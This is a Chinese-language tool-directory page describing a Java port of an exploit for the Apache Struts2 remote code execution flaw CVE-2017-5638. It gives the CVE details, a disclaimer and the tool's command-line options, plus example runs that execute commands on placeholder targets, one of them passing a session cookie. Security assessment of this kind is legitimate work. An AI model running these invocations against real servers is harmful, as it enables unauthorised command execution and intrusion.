Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
struts2_cve-2017-5638 — 基于Java的Apache Struts2 CVE-2017-5638利用,通过精心构造的HTTP头执行任意命令。用于授权的安全评估。 | Kitploit
工具/GitHubGitHub/m3ssap0/struts2_cve-2017-5638
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队
GitHubm3ssap0/struts2_cve-2017-5638

struts2_cve-2017-5638

基于Java的Apache Struts2 CVE-2017-5638利用,通过精心构造的HTTP头执行任意命令。用于授权的安全评估。

查看仓库
118年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

struts2_cve-2017-5638

这是一个对 Python 漏洞利用代码的 Java 移植版本,原代码位于:https://www.exploit-db.com/exploits/41570/。

该软件编写为无外部依赖。

免责声明

此工具仅供安全工程师和应用程序安全人员用于安全评估。请负责任地使用此工具。本人不对任何人使用此应用程序的方式承担责任。对于因使用此工具造成的任何损害或引发的任何犯罪,本人概不负责。

漏洞信息

  • CVE-ID:CVE-2017-5638
  • 链接:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638
  • 描述:Apache Struts 2 2.3.x 系列(2.3.32 之前版本)和 2.5.x 系列(2.5.10.1 之前版本)中的 Jakarta Multipart 解析器在文件上传尝试期间存在异常处理和错误消息生成缺陷,允许远程攻击者通过精心构造的 Content-Type、Content-Disposition 或 Content-Length HTTP 标头执行任意命令,该漏洞于 2017 年 3 月被野外利用,利用方式为在 Content-Type 标头中包含 #cmd= 字符串。

帮助

root@kitploit:~
用法:
   java -jar struts2_cve-2017-5638.jar [选项]
描述:
   利用 Apache Struts2 远程代码执行漏洞(CVE-2017-5638)。
选项:
   -h, --help
      打印此帮助信息并退出。
   -u, --url [目标URL]
      将执行漏洞利用的目标URL。
   -cmd, --command [要执行的命令]
      将在远程机器上执行的命令。
   --cookies [cookies]
      可选。传入请求的Cookie,例如身份验证Cookie。
   -v, --verbose
      可选。增加详细输出。

示例

root@kitploit:~
java -jar struts2_cve-2017-5638.jar --url "https://vuln1.foo.com/asd" --command ipconfig
root@kitploit:~
java -jar struts2_cve-2017-5638.jar --url "https://vuln2.foo.com/asd" --command ipconfig --cookies "JSESSIONID=qwerty0123456789"
root@kitploit:~
java -jar struts2_cve-2017-5638.jar --url "https://vuln3.foo.com/asd" --command dir --cookies "JSESSIONID=qwerty0123456789;foo=bar"

作者

  • Antonio Francesco Sardella - Java 移植 - m3ssap0

许可证

本项目采用 MIT 许可证授权 - 详情参见 LICENSE.txt 文件。

致谢

  • Vex Woo 提供了原始的 Python 漏洞利用代码。
下载工具